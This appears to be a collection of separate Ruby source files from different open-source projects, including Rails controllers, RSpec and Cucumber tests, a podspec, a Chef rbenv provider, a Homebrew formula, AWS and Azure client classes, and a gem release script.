it "cancels the linked assessment" do
expect(linked_assessment.get("cancelled_at")).not_to be_nil
end
end
context "when one half of a linked pair is already cancelled" do
before do
assessments_gateway.update_statuses(
%w[0000-0000-0000-0000-0001],
"cancelled_at",
Time.now.to_s,
)
end
it "cancels the uncancelled certificate" do
use_case.execute("0000-0000-0000-0000-0000", "CANCELLED", [scheme_id])
expect(assessment.get("cancelled_at")).not_to be_nil
end
end
describe "event broadcasting" do
around do |test|
Events::Broadcaster.enable!
test.run
Events::Broadcaster.disable!
end
context "when an assessment is cancelled" do
it "broadcasts an assessment_cancelled event" do
expect { use_case.execute("0000-0000-0000-0000-0000", "CANCELLED", [scheme_id]) }.to broadcast(:assessment_cancelled, assessment_id: "0000-0000-0000-0000-0000")
end
end
context "when an assessment is marked not for issue" do
it "broadcasts an assessment_marked_not_for_issue event" do
expect { use_case.execute("0000-0000-0000-0000-0000", "NOT_FOR_ISSUE", [scheme_id]) }.to broadcast(:assessment_marked_not_for_issue, assessment_id: "0000-0000-0000-0000-0000")
end
end
end
end
| 30.366667 | 183 | 0.712404 |
1caa0c78bfa2b90a7dd8f5cedb23adfed4153d89 | 1,890 | Pod::Spec.new do |s|
s.name = 'sReto'
s.version = '3.0.0'
s.summary = 'P2P Framework for realtime collaboration in Swift with independent modules for WLAN, Bluetooth and Remote support'
s.homepage = 'https://github.com/ls1intum/sReto'
s.license = 'MIT'
s.author = { 'Chair for Applied Software Engineering' => '[email protected]' }
s.social_media_url = 'https://twitter.com/ls1intum'
s.requires_arc = true
s.ios.deployment_target = '11.3'
s.osx.deployment_target = '10.13.4'
s.swift_version = '4.1'
s.source = { :git => 'https://github.com/workingDog/sReto.git', :tag => s.version }
s.default_subspec = 'WlanModule'
s.subspec 'Core' do |c|
c.source_files = 'Source/sReto/Core/**/*.swift'
end
s.subspec 'Bonjour' do |b|
b.source_files = 'Source/sReto/Modules/Bonjour/**/*.swift'
b.dependency 'sReto/Core'
b.dependency 'CocoaAsyncSocket', '7.6.3'
end
s.subspec 'WlanModule' do |wm|
wm.source_files = 'Source/sReto/Modules/WlanModule/*.swift'
wm.dependency 'sReto/Bonjour'
end
s.subspec 'BluetoothModule' do |bm|
bm.source_files = 'Source/sReto/Modules/BluetoothModule/*.swift'
bm.dependency 'sReto/Bonjour'
bm.dependency 'sReto/no-arc'
end
s.subspec 'RemoteModule' do |rm|
rm.source_files = 'Source/sReto/Modules/RemoteModule/**/*.swift'
rm.dependency 'sReto/Core'
rm.dependency 'SocketRocket', '0.5.1'
end
s.subspec 'AllModules' do |am|
am.dependency 'sReto/RemoteModule'
am.dependency 'sReto/WlanModule'
am.dependency 'sReto/BluetoothModule'
end
s.subspec 'no-arc' do |n|
n.source_files = 'Source/sReto/Modules/BluetoothModule/DNSSD/*'
n.requires_arc = false
end
end
| 32.586207 | 140 | 0.61164 |
87c4392fa259742eedc50e4f3d61f1a0e0dc640e | 764 | module Aviator
define_request :get_default_quotas, inherit: [:openstack, :common, :v2, :admin, :base] do
meta :service, :volume
meta :api_version, :v2
link 'documentation',
'http://docs.openstack.org/trunk/openstack-ops/content/projects_users.html'
link 'documentation',
'https://github.com/openstack/python-cinderclient/blob/master/cinderclient/v2/quotas.py'
param :tenant_id, required: true
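    # Hypothetical invocation (exact session API sketched, not guaranteed):
    #   session.volume_service.request(:get_default_quotas) { |params| params[:tenant_id] = 'abc123' }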
def headers
super
end
def http_method
:get
end
def url
service_spec = session_data[:access][:serviceCatalog].find{|s| s[:type] == 'volumev2' }
v2_url = service_spec[:endpoints][0][:adminURL]
"#{ v2_url }/os-quota-sets/#{ params[:tenant_id] }/defaults"
end
end
end | 22.470588 | 94 | 0.65445 |
d5501c15bc35e3f4ee11c4d8edf57f7a1e43babe | 391 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_07_01
module Models
#
# Defines values for FirewallPolicyNatRuleCollectionActionType
#
module FirewallPolicyNatRuleCollectionActionType
DNAT = "DNAT"
end
end
end
| 24.4375 | 70 | 0.744246 |
38e4437a91582d78b3e19228985642e27459eec5 | 1,134 | require 'sprockets'
require 'sprockets/htmlimports/patches/asset_attributes'
require 'sprockets/htmlimports/patches/base'
require 'sprockets/htmlimports/patches/compressing'
require 'sprockets/htmlimports/patches/context'
require 'sprockets/htmlimports/base_processor'
require 'sprockets/htmlimports/bundle_reprocessor'
require 'sprockets/htmlimports/postprocessor'
require 'sprockets/htmlimports/simple_html_compressor'
require 'sprockets/htmlimports/wrapped_asset'
Sprockets.register_mime_type 'text/html', '.html'
Sprockets.register_postprocessor 'text/html', Sprockets::HTMLImports::Postprocessor
Sprockets.register_bundle_processor 'text/html', Sprockets::HTMLImports::BundleReprocessor
Sprockets.register_compressor 'text/html', :simple, Sprockets::HTMLImports::SimpleHTMLCompressor
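# With these registrations, `.html` assets flow through the pipeline like JS/CSS:
# post-processed for imports, re-bundled, and optionally minified via :simple.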
begin
require 'action_view'
rescue LoadError
end
if defined? ::ActionView
require 'sprockets/htmlimports/action_view/asset_tag_helper'
require 'sprockets/htmlimports/action_view/asset_url_helper'
end
begin
require 'rails/railtie'
rescue LoadError
end
if defined? ::Rails::Railtie
require 'sprockets/htmlimports/rails/railtie'
end
| 32.4 | 96 | 0.840388 |
181b46161b49c4307f0ad6fd907744d7034618ba | 1,361 | # encoding: UTF-8
module Lambit
module Aws
module CloudWatch
class Alarm
OPTIONS = [
:alarm_name,
:alarm_description,
:actions_enabled,
:ok_actions,
:alarm_actions,
:insufficient_data_actions,
:metric_name,
:namespace,
:statistic,
:dimensions,
:period,
:unit,
:evaluation_periods,
:threshold,
:comparison_operator,
:alarm_names
].each { |option| attr_reader option }
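        # Hypothetical usage sketch (only the options you set are forwarded):
        #   alarm = Alarm.new(alarm_name: 'high-errors', metric_name: 'Errors',
        #                     namespace: 'AWS/Lambda', threshold: 1.0, ...)
        #   alarm.put_metric_alarm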
attr_reader :client
attr_reader :options
def initialize(config)
@client = ::Aws::CloudWatch::Client.new
OPTIONS.each do |option|
if config.has_key?(option)
instance_variable_set("@#{option}", config[option])
end
end
end
def options
options = {}
OPTIONS.each do |option|
value = self.send(option)
options[option] = value unless value.nil?
end
options
end
def put_metric_alarm
self.client.put_metric_alarm options
end
def delete_alarms
self.client.delete_alarms options
end
end
end
end
end
| 22.683333 | 65 | 0.495959 |
6299fabf383ede56a1fa8bce58d40b29ef3f7146 | 494 | # encoding: utf-8
require 'spec/expectations'
$:.unshift(File.dirname(__FILE__) + '/../../lib') # This line is not needed in your own project
require 'cucumber/formatter/unicode'
require 'calculadora'
Before do
@calc = Calculadora.new
end
After do
end
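# The step patterns below are in Portuguese to match the feature files; roughly:
#   "que eu digitei N na calculadora"     => "given I have entered N into the calculator"
#   "eu aperto o botão de soma"           => "when I press the add button"
#   "o resultado na calculadora deve ser" => "the result on the calculator should be"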
Given /que eu digitei (\d+) na calculadora/ do |n|
@calc.push n.to_i
end
When 'eu aperto o botão de soma' do
@result = @calc.soma
end
Then /o resultado na calculadora deve ser (\d*)/ do |result|
@result.should == result.to_i
end
| 19.76 | 95 | 0.704453 |
ab95eaa6448d9a2f6cc9523a022f4c5983ab4b81 | 1,232 | module Admin
class PermissionsController < ::AdminController
before_action :find_employee, only: %i[update destroy]
before_action :valid_employee
def update
@employee.update(role: :manager)
@employees = current_company.employees.active.order(role: :desc, name: :asc)
respond_to do |format|
format.turbo_stream do
render turbo_stream: turbo_stream.update('employees-list', partial: "admin/employees/employee", collection: @employees)
end
format.html { redirect_to admin_employees_url }
end
end
def destroy
@employee.update(role: :employee)
@employees = current_company.employees.active.order(role: :desc, name: :asc)
respond_to do |format|
format.turbo_stream do
render turbo_stream: turbo_stream.update('employees-list', partial: "admin/employees/employee", collection: @employees)
end
format.html { redirect_to admin_employees_url }
end
end
private
def find_employee
@employee = current_company.employees.find(params[:employee_id])
end
def valid_employee
redirect_to admin_employees_url and return false if @employee.administration?
end
end
end
| 28 | 129 | 0.691558 |
26c8a73c09adaed89cd7aa30bb9abb717c8dcf09 | 1,068 | module GamesAdmin
class GamesController < ApplicationController
before_action :set_game, only: [:show, :edit, :update, :destroy]
def index
@games = AppComponent::Game.all
end
def show
end
def new
@game = AppComponent::Game.new
end
def edit
end
def create
@game = AppComponent::Game.new(game_params)
if @game.save
redirect_to @game, notice: 'Game was successfully created.'
else
render :new
end
end
def update
if @game.update(game_params)
redirect_to @game, notice: 'Game was successfully updated.'
else
render :edit
end
end
def destroy
@game.destroy
redirect_to games_url, notice: 'Game was successfully destroyed.'
end
private
def set_game
@game = AppComponent::Game.find(params[:id])
end
def game_params
params.require(:game).permit(:date, :location, :first_team_id, :second_team_id, :winning_team, :first_team_score, :second_team_score)
end
end
end
| 20.538462 | 141 | 0.626404 |
0358fbaa047c773b0c656f295168aa2fe78132ca | 3,488 | component "rubygem-ffi" do |pkg, settings, platform|
pkg.version '1.9.25'
pkg.md5sum "e8923807b970643d9e356a65038769ac"
instance_eval File.read('configs/components/_base-rubygem.rb')
  # Windows versions of the FFI gem have custom filenames, so we overwrite the
# defaults that _base-rubygem provides here, just for Windows.
if platform.is_windows?
# Vanagon's `pkg.mirror` is additive, and the _base_rubygem sets the
# non-Windows gem as the first mirror, which is incorrect. We need to unset
# the list of mirrors before adding the Windows-appropriate ones here:
@component.mirrors = []
# Same for install steps:
@component.install = []
if platform.architecture == "x64"
pkg.md5sum "e263997763271fba35562245b450576f"
pkg.url "https://rubygems.org/downloads/ffi-#{pkg.get_version}-x64-mingw32.gem"
pkg.mirror "#{settings[:buildsources_url]}/ffi-#{pkg.get_version}-x64-mingw32.gem"
else
pkg.md5sum "3303124f1ca0ee3e59829301ffcad886"
pkg.url "https://rubygems.org/downloads/ffi-#{pkg.get_version}-x86-mingw32.gem"
pkg.mirror "#{settings[:buildsources_url]}/ffi-#{pkg.get_version}-x86-mingw32.gem"
end
pkg.install do
"#{settings[:gem_install]} ffi-#{pkg.get_version}-#{platform.architecture}-mingw32.gem"
end
end
if platform.is_solaris?
base_ruby = case platform.os_version
when "10"
"/opt/csw/lib/ruby/2.0.0"
when "11"
"/opt/pl-build-tools/lib/ruby/2.1.0"
end
ffi_lib_version = case platform.os_version
when "10"
"6.0.4"
when "11"
"5.0.10"
end
pkg.environment "PATH", "/opt/pl-build-tools/bin:/opt/csw/bin:$$PATH"
case platform.os_version
when "10"
pkg.install_file "/opt/csw/lib/libffi.so.#{ffi_lib_version}", "#{settings[:libdir]}/libffi.so.6"
when "11"
pkg.environment "CPATH", "/opt/csw/lib/libffi-3.2.1/include"
pkg.environment "MAKE", platform[:make]
if platform.is_cross_compiled?
# install libffi.so from pl-build-tools
pkg.install_file "#{settings[:tools_root]}/#{settings[:platform_triple]}/sysroot/usr/lib/libffi.so.#{ffi_lib_version}", "#{settings[:libdir]}/libffi.so"
# monkey-patch rubygems to think we're running on the destination ruby and architecture
ruby_api_version = settings[:ruby_version].gsub(/\.\d*$/, '.0')
pkg.build do
[
%(#{platform[:sed]} -i 's/Gem::Platform.local.to_s/&.gsub("x86", "#{platform.architecture}")/g' #{base_ruby}/rubygems/basic_specification.rb),
%(#{platform[:sed]} -i 's/Gem.extension_api_version/"#{ruby_api_version}"/g' #{base_ruby}/rubygems/basic_specification.rb)
]
end
else
# install system libffi.so if we're not cross compiling
pkg.install_file "/usr/lib/libffi.so.#{ffi_lib_version}", "#{settings[:libdir]}/libffi.so"
end
end
if platform.is_cross_compiled?
# monkey-patch rubygems to require our custom rbconfig when
# building gems with native extensions
sed_command = %(s|Gem.ruby|&, '-r/opt/puppetlabs/puppet/share/doc/rbconfig-#{settings[:ruby_version]}-orig.rb'|)
pkg.build do
[
%(#{platform[:sed]} -i "#{sed_command}" #{base_ruby}/rubygems/ext/ext_conf_builder.rb)
]
end
end
end
end
| 40.55814 | 160 | 0.635608 |
08ef5b7f11035209fd1e6a276ec0c1d4d246a88d | 3,331 | #
# Cookbook:: ruby_rbenv
# Provider:: ruby
#
# Author:: Fletcher Nichol <[email protected]>
#
# Copyright:: 2011-2017, Fletcher Nichol
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
use_inline_resources
provides :rbenv_ruby
include Chef::Rbenv::ScriptHelpers
def load_current_resource
@rubie = new_resource.definition
@definition_file = new_resource.definition_file
@root_path = new_resource.root_path
@user = new_resource.user
@environment = new_resource.environment
@patch_url = new_resource.patch_url
@patch_file = new_resource.patch_file
@rbenv_action = new_resource.rbenv_action
end
action :install do # ~FC017
perform_install
end
action :reinstall do # ~FC017
perform_install
end
private
def perform_install
if ruby_build_missing?
Chef::Log.warn(
'ruby_build cookbook is missing. Please add to the run_list (Action will be skipped).')
elsif ruby_installed?
Chef::Log.debug("#{new_resource} is already installed - nothing to do")
else
install_start = Time.now
install_ruby_dependencies
Chef::Log.info("Building #{new_resource}, this could take a while...")
# bypass block scoping issues
rbenv_user = @user
rubie = @rubie
definition = @definition_file || rubie
rbenv_prefix = @root_path
rbenv_env = @environment
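      # ruby-build's `--patch` flag reads a unified diff from stdin, so the
      # patch source (a remote URL via curl, or a local file) is redirected
      # into the install command built below.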
patch_command = nil
patch_command = "--patch < <(curl -sSL #{@patch_url})" if @patch_url
patch_command = "--patch < #{@patch_file}" if @patch_file
command = %(rbenv #{@rbenv_action} #{definition} #{patch_command})
rbenv_script "#{command} #{which_rbenv}" do
code command
user rbenv_user if rbenv_user
root_path rbenv_prefix if rbenv_prefix
environment rbenv_env if rbenv_env
action :nothing
end.run_action(:run)
Chef::Log.debug("#{new_resource} build time was " \
"#{(Time.now - install_start) / 60.0} minutes")
end
end
def ruby_installed?
if Array(new_resource.action).include?(:reinstall)
false
else
::File.directory?(::File.join(rbenv_root, 'versions', @rubie))
end
end
def ruby_build_missing?
!run_context.loaded_recipe?('ruby_build')
end
def install_ruby_dependencies
definition = ::File.basename(new_resource.definition)
case definition
when /^\d\.\d\.\d/, /^rbx-/, /^ree-/
pkgs = node['ruby_build']['install_pkgs_cruby']
when /^jruby-/
pkgs = node['ruby_build']['install_pkgs_jruby']
end
pkgs.each do |pkg|
package pkg do
action :nothing
end.run_action(:install)
end
ensure_java_environment if definition =~ /^jruby-/
end
def ensure_java_environment
resource_collection.find(
'ruby_block[update-java-alternatives]'
).run_action(:create)
rescue Chef::Exceptions::ResourceNotFound
# have pity on my soul
Chef::Log.info 'The java cookbook does not appear to in the run_list.'
end
| 26.436508 | 93 | 0.720805 |
e2c8a801301a362f14b2471ba4c8316bbf20bec6 | 1,606 | test_name 'C3436 - checkout a branch (git protocol)'
# Globals
repo_name = 'testrepo_branch_checkout'
branch = 'a_branch'
hosts.each do |host|
tmpdir = host.tmpdir('vcsrepo')
step 'setup - create repo' do
git_pkg = 'git'
if host['platform'] =~ %r{ubuntu-10}
git_pkg = 'git-core'
end
install_package(host, git_pkg)
my_root = File.expand_path(File.join(File.dirname(__FILE__), '../../../..'))
scp_to(host, "#{my_root}/acceptance/files/create_git_repo.sh", tmpdir)
on(host, "cd #{tmpdir} && ./create_git_repo.sh")
end
step 'setup - start git daemon' do
install_package(host, 'git-daemon') unless host['platform'] =~ %r{debian|ubuntu}
on(host, "git daemon --base-path=#{tmpdir} --export-all --reuseaddr --verbose --detach")
end
teardown do
on(host, "rm -fr #{tmpdir}")
on(host, 'pkill -9 git-daemon ; sleep 1')
end
step 'checkout a branch with puppet' do
pp = <<-MANIFEST
vcsrepo { "#{tmpdir}/#{repo_name}":
ensure => present,
source => "git://#{host}/testrepo.git",
provider => git,
revision => '#{branch}',
}
MANIFEST
apply_manifest_on(host, pp, catch_failures: true)
apply_manifest_on(host, pp, catch_changes: true)
end
step "verify checkout is on the #{branch} branch" do
on(host, "ls #{tmpdir}/#{repo_name}/.git/") do |res|
fail_test('checkout not found') unless res.stdout.include? 'HEAD'
end
on(host, "cat #{tmpdir}/#{repo_name}/.git/HEAD") do |res|
fail_test('branch not found') unless res.stdout.include? "ref: refs/heads/#{branch}"
end
end
end
| 30.301887 | 93 | 0.634496 |
d559e1de48341f6c1b9565aab2a0a4a7ab82ee5f | 479 | cask 'bunq' do
version '0.8.11'
sha256 'ff461b377e5b6acd9bffd86e2c8367eb3ec2e1e6734c8a64f58ef4b8aed3eb05'
# github.com/BunqCommunity/BunqDesktop was verified as official when first introduced to the cask
url "https://github.com/BunqCommunity/BunqDesktop/releases/download/#{version}/BunqDesktop-#{version}.dmg"
appcast 'https://github.com/BunqCommunity/BunqDesktop/releases.atom'
name 'BunqDesktop'
homepage 'https://bunqdesktop.com/'
app 'BunqDesktop.app'
end
| 36.846154 | 108 | 0.787056 |
0393bfb07a851614389bf3f1d7f150582274cf12 | 1,902 | require 'spec_helper'
describe Admin::Merchandise::Multi::VariantsController do
render_views
before(:each) do
activate_authlogic
@user = create_admin_user
login_as(@user)
end
it "edit action should render edit template" do
@product = FactoryGirl.create(:product)
get :edit, product_id: @product.id
expect(response).to render_template(:edit)
end
it "update action should render edit template when model is invalid" do
@product = FactoryGirl.create(:product)
Product.any_instance.stubs(:valid?).returns(false)
put :update, product_id: @product.id, product: product_attributes
expect(response).to render_template(:edit)
end
it "update action should redirect when model is valid" do
@product = FactoryGirl.create(:product)
#Product.any_instance.stubs(:valid?).returns(true)
#Variant.any_instance.stubs(:valid?).returns(true)
put :update, product_id: @product.id, product: product_attributes
@product.reload
expect(response).to redirect_to(admin_merchandise_product_url(@product))
expect(@product.variants.first.variant_properties.count).to eq 2
expect(@product.variants.first.variant_properties.map(&:description)).to include 'Red'
expect(@product.variants.first.variant_properties.map(&:description)).to include 'Small'
end
def product_attributes
{"variants_attributes" => {
"new_variants" => {"sku"=>"0000-0000-000001", "price"=>"30.0", "cost"=>"10.0", "name"=>"", "inactivate"=>"0",
"variant_properties_attributes" => {"0" => {"primary"=>"1", "property_id"=>"1", "description"=>"Red", "id"=>""},
"1" => {"primary"=>"0", "property_id"=>"2", "description"=>"Small", "id"=>""},
"2" => {"primary"=>"0", "property_id"=>"3", "description"=>""}} }
}}
end
end
| 40.468085 | 125 | 0.644585 |
21609933d2f9678b0c0a8536b9f00377b1aa75ad | 723 | begin
require_relative 'helper'
rescue LoadError
end
class TestFiddle < Fiddle::TestCase
def test_constants_match
[
:TYPE_VOID,
:TYPE_VOIDP,
:TYPE_CHAR,
:TYPE_SHORT,
:TYPE_INT,
:TYPE_LONG,
:TYPE_LONG_LONG,
:TYPE_FLOAT,
:TYPE_DOUBLE,
].each do |name|
assert_equal(DL.const_get(name), Fiddle.const_get(name))
end
end
def test_windows_constant
require 'rbconfig'
if RbConfig::CONFIG['host_os'] =~ /mswin|mingw/
assert Fiddle::WINDOWS, "Fiddle::WINDOWS should be 'true' on Windows platforms"
else
refute Fiddle::WINDOWS, "Fiddle::WINDOWS should be 'false' on non-Windows platforms"
end
end
end if defined?(Fiddle)
| 21.909091 | 90 | 0.659751 |
6af41b21e2d733a3a7440bdd9a79da6ef7c78ab6 | 211 | class AddSpecialTypeToSubmission < ActiveRecord::Migration[4.2]
def self.up
add_column :submissions, :special_type, :integer
end
def self.down
    remove_column :submissions, :special_type
end
end
| 21.1 | 63 | 0.758294 |
bb4c061d09515530e10bf31059fdcdcb511e9ad3 | 424 | class RemoveMandatoryOfResumeUrlAddFeedbackFromApplications < ActiveRecord::Migration[5.0]
#add_feedback_from_applications
def self.up
change_column_null :my_applications, :cv_url, true
add_column :my_applications, :overall_feedback, :text, null: true, default: ''
end
def self.down
remove_column :my_applications, :overall_feedback
change_column_null :my_applications, :cv_url, false, ''
end
end
| 32.615385 | 90 | 0.78066 |
d5ad201cd4f78b4268f277e3d2daf18ce1f383d7 | 3,479 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_08_01
module Models
#
# Trusted Root certificates of an application gateway.
#
class ApplicationGatewayTrustedRootCertificate < SubResource
include MsRestAzure
# @return [String] Certificate public data.
attr_accessor :data
# @return [String] Secret Id of (base-64 encoded unencrypted pfx)
# 'Secret' or 'Certificate' object stored in KeyVault.
attr_accessor :key_vault_secret_id
# @return [ProvisioningState] The provisioning state of the trusted root
# certificate resource. Possible values include: 'Succeeded', 'Updating',
# 'Deleting', 'Failed'
attr_accessor :provisioning_state
# @return [String] Name of the trusted root certificate that is unique
# within an Application Gateway.
attr_accessor :name
# @return [String] A unique read-only string that changes whenever the
# resource is updated.
attr_accessor :etag
# @return [String] Type of the resource.
attr_accessor :type
#
# Mapper for ApplicationGatewayTrustedRootCertificate class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ApplicationGatewayTrustedRootCertificate',
type: {
name: 'Composite',
class_name: 'ApplicationGatewayTrustedRootCertificate',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'id',
type: {
name: 'String'
}
},
data: {
client_side_validation: true,
required: false,
serialized_name: 'properties.data',
type: {
name: 'String'
}
},
key_vault_secret_id: {
client_side_validation: true,
required: false,
serialized_name: 'properties.keyVaultSecretId',
type: {
name: 'String'
}
},
provisioning_state: {
client_side_validation: true,
required: false,
serialized_name: 'properties.provisioningState',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
serialized_name: 'name',
type: {
name: 'String'
}
},
etag: {
client_side_validation: true,
required: false,
serialized_name: 'etag',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
serialized_name: 'type',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 30.252174 | 79 | 0.511066 |
ac317390bcb290c03f310243540feb9dd589b052 | 137 | require "rubygems_test_repo_3fd2/version"
module RubygemsTestRepo3fd2
class Error < StandardError; end
# Your code goes here...
end
| 19.571429 | 41 | 0.788321 |
e84ac2f57d9eb051d3a0c52f99c3f2e950f9f87f | 2,198 | class CollectorSidecar < Formula
desc "Manage log collectors through Graylog"
homepage "https://github.com/Graylog2/collector-sidecar"
url "https://github.com/Graylog2/collector-sidecar/archive/1.0.2.tar.gz"
sha256 "ee7ddb725d3475656df0bb08476e64c7f919acfc011a338b4532249363778130"
bottle do
cellar :any_skip_relocation
sha256 "a246ba4b742f4813ea11488b1b958806d0852af192381b686326d28339651014" => :catalina
sha256 "c5df7e3fe89d27da283cba2d44c8d9bfd4edd686167b8d4acf0c6f0387154fef" => :mojave
sha256 "267c985605ca057bff286bc111fc6ac84dfc0d4bb391da19c044ddef381c7a74" => :high_sierra
sha256 "6e09f805d30b96d2650a6541fddbda8a55d6ef74d7de7e96c642df5d2cd7d18b" => :sierra
sha256 "d3992dcaef26a9cbfaa9f8433cd8a17c854b1de2b9a23273e36ebc4910ad9d39" => :x86_64_linux
end
depends_on "glide" => :build
depends_on "go" => :build
depends_on "mercurial" => :build
depends_on "filebeat"
def install
ENV["GOPATH"] = buildpath
ENV["GLIDE_HOME"] = HOMEBREW_CACHE/"glide_home/#{name}"
(buildpath/"src/github.com/Graylog2/collector-sidecar").install buildpath.children
cd "src/github.com/Graylog2/collector-sidecar" do
inreplace "main.go", "/etc", etc
inreplace "sidecar-example.yml" do |s|
s.gsub! "/usr", HOMEBREW_PREFIX
s.gsub! "/etc", etc
s.gsub! "/var", var
end
system "glide", "install"
system "make", "build"
(etc/"graylog/sidecar/sidecar.yml").install "sidecar-example.yml"
bin.install "graylog-sidecar"
prefix.install_metafiles
end
end
plist_options :manual => "graylog-sidecar"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/graylog-sidecar</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
assert_match version.to_s, shell_output("#{bin}/graylog-sidecar -version")
end
end
| 32.80597 | 94 | 0.685623 |
18a806c64487da150e69eed6e77d82fcb9e08d62 | 278 | require 'rails'
require 'jbuilder'
require "shp_api/version"
require "shp_api/rescue_from"
require "shp_api/json_responder"
module ShpApi
def self.root
File.expand_path('../..', __FILE__)
end
def self.view_path
File.join(root, 'app', 'views')
end
end
| 14.631579 | 39 | 0.690647 |
3323785494916f8d3bf930d227d77c17c6c14f8d | 3,160 | # frozen_string_literal: true
require "test_helper"
class ActionCable::Connection::SubscriptionsTest < ActionCable::TestCase
class Connection < ActionCable::Connection::Base
attr_reader :websocket
def send_async(method, *args)
send method, *args
end
end
class ChatChannel < ActionCable::Channel::Base
attr_reader :room, :lines
def subscribed
@room = Room.new params[:id]
@lines = []
end
def speak(data)
@lines << data
end
end
setup do
@server = TestServer.new
@chat_identifier = ActiveSupport::JSON.encode(id: 1, channel: "ActionCable::Connection::SubscriptionsTest::ChatChannel")
end
test "subscribe command" do
run_in_eventmachine do
setup_connection
channel = subscribe_to_chat_channel
assert_kind_of ChatChannel, channel
assert_equal 1, channel.room.id
end
end
test "subscribe command without an identifier" do
run_in_eventmachine do
setup_connection
@subscriptions.execute_command "command" => "subscribe"
assert_empty @subscriptions.identifiers
end
end
test "unsubscribe command" do
run_in_eventmachine do
setup_connection
subscribe_to_chat_channel
channel = subscribe_to_chat_channel
channel.expects(:unsubscribe_from_channel)
@subscriptions.execute_command "command" => "unsubscribe", "identifier" => @chat_identifier
assert_empty @subscriptions.identifiers
end
end
test "unsubscribe command without an identifier" do
run_in_eventmachine do
setup_connection
@subscriptions.execute_command "command" => "unsubscribe"
assert_empty @subscriptions.identifiers
end
end
test "message command" do
run_in_eventmachine do
setup_connection
channel = subscribe_to_chat_channel
data = { "content" => "Hello World!", "action" => "speak" }
@subscriptions.execute_command "command" => "message", "identifier" => @chat_identifier, "data" => ActiveSupport::JSON.encode(data)
assert_equal [ data ], channel.lines
end
end
test "unsubscribe from all" do
run_in_eventmachine do
setup_connection
channel1 = subscribe_to_chat_channel
channel2_id = ActiveSupport::JSON.encode(id: 2, channel: "ActionCable::Connection::SubscriptionsTest::ChatChannel")
channel2 = subscribe_to_chat_channel(channel2_id)
channel1.expects(:unsubscribe_from_channel)
channel2.expects(:unsubscribe_from_channel)
@subscriptions.unsubscribe_from_all
end
end
private
def subscribe_to_chat_channel(identifier = @chat_identifier)
@subscriptions.execute_command "command" => "subscribe", "identifier" => identifier
assert_equal identifier, @subscriptions.identifiers.last
@subscriptions.send :find, "identifier" => identifier
end
def setup_connection
env = Rack::MockRequest.env_for "/test", "HTTP_HOST" => "localhost", "HTTP_CONNECTION" => "upgrade", "HTTP_UPGRADE" => "websocket"
@connection = Connection.new(@server, env)
@subscriptions = ActionCable::Connection::Subscriptions.new(@connection)
end
end
| 27.008547 | 137 | 0.709177 |
01c3936f40907252dc6e52eb057780b277510669 | 125 | json.extract! comment, :id, :user, :post_id, :content, :created_at, :updated_at
json.url comment_url(comment, format: :json)
| 41.666667 | 79 | 0.744 |
0159ceaf4effddef6432b0a44573d9f03266d8bb | 4,994 | ## Releasing a new version of octofacts
##
## 1. Update `.version` with new version number
## 2. Run `script/bootstrap` to update Gemfile.lock
## 3. Commit changes, PR, and merge to master
## 4. Check out master branch locally
## 5. Run `bundle exec rake gem:release`
require "fileutils"
require "open3"
require "shellwords"
module Octofacts
# A class to contain methods and constants for cleaner code
class Gem
BASEDIR = File.expand_path("..", File.dirname(__FILE__)).freeze
GEMS = ["octofacts", "octofacts-updater"].freeze
PKGDIR = File.join(BASEDIR, "pkg").freeze
# Verify that Gemfile.lock matches .version and that it's committed, since `bundle exec ...` will
# update the file for us.
def self.verify_gemfile_version!
bundler = Bundler::LockfileParser.new(Bundler.read_file(File.expand_path("../Gemfile.lock", File.dirname(__FILE__))))
gems = bundler.specs.select { |specs| GEMS.include?(specs.name) }
GEMS.each do |gem|
this_gem = gems.detect { |g| g.name == gem }
unless this_gem
raise "Did not find #{gem} in Gemfile.lock"
end
unless this_gem.version.to_s == version
raise "Gem #{gem} is version #{this_gem.version}, not #{version}"
end
end
puts "Ensuring that all changes are committed."
exec_command("git diff-index --quiet HEAD --")
puts "OK: All gems on #{version} and no uncommitted changes here."
end
# Read the version number from the .version file in the root of the project.
def self.version
@version ||= File.read(File.expand_path("../.version", File.dirname(__FILE__))).strip
end
# Determine what branch we are on
def self.branch
exec_command("git rev-parse --abbrev-ref HEAD").strip
end
# Build the gem and put it into the 'pkg' directory
def self.build
Dir.mkdir PKGDIR unless File.directory?(PKGDIR)
GEMS.each do |gem|
begin
output_file = File.join(BASEDIR, "#{gem}-#{version}.gem")
target_file = File.join(PKGDIR, "#{gem}-#{version}.gem")
exec_command("gem build #{gem}.gemspec")
unless File.file?(output_file)
raise "gem #{gem} failed to create expected output file"
end
FileUtils.mv output_file, target_file
puts "Generated #{target_file}"
ensure
# Clean up the *.gem generated in the main directory if it's still there
FileUtils.rm(output_file) if File.file?(output_file)
end
end
end
# Push the gem to rubygems
def self.push
GEMS.each do |gem|
target_file = File.join(PKGDIR, "#{gem}-#{version}.gem")
unless File.file?(target_file)
raise "Cannot push: #{target_file} does not exist"
end
end
GEMS.each do |gem|
target_file = File.join(PKGDIR, "#{gem}-#{version}.gem")
exec_command("gem push #{Shellwords.escape(target_file)}")
end
end
# Tag the release on GitHub
def self.tag
# Make sure we have not released this version before
exec_command("git fetch -t origin")
